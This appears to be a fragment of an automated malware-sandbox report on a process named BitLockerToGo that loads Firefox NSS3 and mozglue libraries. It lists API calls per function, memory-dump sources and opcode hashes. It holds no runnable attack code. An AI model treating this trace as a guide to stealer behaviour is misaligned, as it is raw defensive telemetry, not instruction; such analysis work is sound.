                                                                                                                                                                                                                                                                                                                    • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CB5CDE8
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CB5CDFF
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CB5CE16
                                                                                                                                                                                                                                                                                                                    • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CB5CE29
                                                                                                                                                                                                                                                                                                                    • PR_UnloadLibrary.NSS3(00000000), ref: 6CB5CE48
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                                                                                    • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3bcc6d086efffc8c15aee239c57726a2ba3e40fb2f6706d18e1f6b74231bc839
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ba3561f3da25026ce0c86ca06e4d6eb4ce347d68f42a4dd3091f000e0298dcb0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bcc6d086efffc8c15aee239c57726a2ba3e40fb2f6706d18e1f6b74231bc839
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F21103E9F031A123EB05AE717C40AAE385A9B1611DF5C4935E815D2F80FB20C56C87F7
                                                                                                                                                                                                                                                                                                                    Function 6C989590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C973217
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C973236
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: FreeLibrary.KERNEL32 ref: 6C97324B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: __Init_thread_footer.LIBCMT ref: 6C973260
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C97327F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C97328E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9732AB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9732D1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9732E5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9731C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9732F7
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C989675
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C989697
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9896E8
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C989707
                                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C98971F
                                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C989773
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9897B7
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C9897D0
                                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C9897EB
                                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C989824
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                                    • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3e9c516aaf32f34f52c933af01da807c0bf2a0de44e21ab0e0de6f84ed66350
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6356b7e3efdd58ba573dbff7cd5c0bbd756f0aaed52408061c941e8ab07aa334
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3e9c516aaf32f34f52c933af01da807c0bf2a0de44e21ab0e0de6f84ed66350
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B61C3717093059FDF00CFA8E884B9ABBF5EB4AB18F214919E92597B80D730E845CB91
                                                                                                                                                                                                                                                                                                                    Function 6CAF6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CBC1DE0,?), ref: 6CAF6CFE
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAF6D26
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CAF6D70
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(00000480), ref: 6CAF6D82
                                                                                                                                                                                                                                                                                                                    • DER_GetInteger_Util.NSS3(?), ref: 6CAF6DA2
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CAF6DD8
                                                                                                                                                                                                                                                                                                                    • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CAF6E60
                                                                                                                                                                                                                                                                                                                    • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CAF6F19
                                                                                                                                                                                                                                                                                                                    • PK11_DigestBegin.NSS3(00000000), ref: 6CAF6F2D
                                                                                                                                                                                                                                                                                                                    • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CAF6F7B
                                                                                                                                                                                                                                                                                                                    • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAF7011
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(00000000), ref: 6CAF7033
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAF703F
                                                                                                                                                                                                                                                                                                                    • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CAF7060
                                                                                                                                                                                                                                                                                                                    • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CAF7087
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CAF70AF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: ef9735621a81bc5b98d3b417e8c08331f46097a386882e9ec069e26ab21b0159
                                                                                                                                                                                                                                                                                                                    • Instruction ID: a61c9275ee0a37858dda9d87188251a987b2bdcd0eb183e962fb964c86fa1e05
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef9735621a81bc5b98d3b417e8c08331f46097a386882e9ec069e26ab21b0159
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62A1F6729142009BFB009F24DC55B6A32A5DB8131CF284939F979DBB81E775D8CAC793
                                                                                                                                                                                                                                                                                                                    Function 6CABAEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF25
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF39
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF51
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABAF69
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CABB06B
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CABB083
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CABB0A4
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CABB0C1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000), ref: 6CABB0D9
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CABB102
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CABB151
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CABB182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFAB0: free.MOZGLUE(?,-00000001,?,?,6CA8F673,00000000,00000000), ref: 6CAEFAC7
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6CABB177
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABB1A2
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3(?,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABB1AA
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6CA9AB95,00000000,?,00000000,00000000,00000000), ref: 6CABB1C2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: TlsGetValue.KERNEL32(00000000,?,6CAB0844,?), ref: 6CAE157A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: EnterCriticalSection.KERNEL32(?,?,?,6CAB0844,?), ref: 6CAE158F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAE1560: PR_Unlock.NSS3(?,?,?,?,6CAB0844,?), ref: 6CAE15B2
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4188828017-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e50ad239b1a4a8174dc8862ac1709e1de290970eece54ee33ee26960ed709d49
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 255bd1a999680ef67adfd73984092d05472d02d100ead5f4f915a954d3773c0e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e50ad239b1a4a8174dc8862ac1709e1de290970eece54ee33ee26960ed709d49
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDA1B3B1D002059FEF009FA4ED81BEE7BB8EF08308F144125E909A7751E731E999CBA1
                                                                                                                                                                                                                                                                                                                    Function 6CB0AD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0ADB1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEBE30: SECOID_FindOID_Util.NSS3(6CAA311B,00000000,?,6CAA311B,?), ref: 6CAEBE44
                                                                                                                                                                                                                                                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CB0ADF4
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CB0AE08
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB0AE25
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3 ref: 6CB0AE63
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CB0AE4D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: TlsGetValue.KERNEL32(?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14C97
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CB0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA14C70: PR_Unlock.NSS3(?,?,?,?,?,6CA13921,6CBF14E4,6CB5CC70), ref: 6CA14CC9
                                                                                                                                                                                                                                                                                                                    • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0AE93
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF2AA4,6CAF12D0), ref: 6CB0AECC
                                                                                                                                                                                                                                                                                                                    • PL_FreeArenaPool.NSS3 ref: 6CB0AEDE
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3 ref: 6CB0AEE6
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB0AEF5
                                                                                                                                                                                                                                                                                                                    • PL_FinishArenaPool.NSS3 ref: 6CB0AF16
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                                                                                                                                                                                                                                                                                    • String ID: security
                                                                                                                                                                                                                                                                                                                    • API String ID: 3441714441-3315324353
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 632d0f8a6360c4e16512fabddd7cb836509d8df8c4883f9c37170c94597de6c8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 193fe49c08a39f76f77622586e16cb76527104301440e00582c0749a1f3945aa
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 632d0f8a6360c4e16512fabddd7cb836509d8df8c4883f9c37170c94597de6c8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A74148B5A0428067EB109B149C44BBB3BA8EF4231CF200D25E965D3F81FB35964D8ED3
                                                                                                                                                                                                                                                                                                                    Function 6CAA8DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?), ref: 6CAA8E22
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAA8E36
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8E4F
                                                                                                                                                                                                                                                                                                                    • calloc.MOZGLUE(00000001,?,?,?), ref: 6CAA8E78
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAA8E9B
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CAA8EAC
                                                                                                                                                                                                                                                                                                                    • PL_ArenaAllocate.NSS3(?,?), ref: 6CAA8EDE
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000008,?,?), ref: 6CAA8EF0
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8F00
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAA8F0E
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CAA8F39
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8F4A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,?), ref: 6CAA8F5B
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAA8F72
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAA8F82
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1569127702-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 48024ac8875d90207b61327f29abcee064265c43d1fc6d82cc17d9504618df61
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b9d5e40b99e342fff7cf73448dcd6a31c6cec3fcd12895dbaacae6eb9958bdca
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48024ac8875d90207b61327f29abcee064265c43d1fc6d82cc17d9504618df61
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0514BB2D002519FD7109FA8DC8496EB7B9FF45758F18412AEC189B700E731ED9687E1
                                                                                                                                                                                                                                                                                                                    Function 6CADEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?), ref: 6CADEE0B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: malloc.MOZGLUE(6CAE8D2D,?,00000000,?), ref: 6CAF0BF8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF0BE0: TlsGetValue.KERNEL32(6CAE8D2D,?,00000000,?), ref: 6CAF0C15
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CADEEE1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6CAD1D7E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1D50: EnterCriticalSection.KERNEL32(?), ref: 6CAD1D8E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD1D50: PR_Unlock.NSS3(?), ref: 6CAD1DD3
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CADEE51
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CADEE65
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CADEEA2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADEEBB
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CADEED0
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CADEF48
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADEF68
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CADEF7D
                                                                                                                                                                                                                                                                                                                    • PK11_DoesMechanism.NSS3(?,?), ref: 6CADEFA4
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADEFDA
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CADF055
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CADF060
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
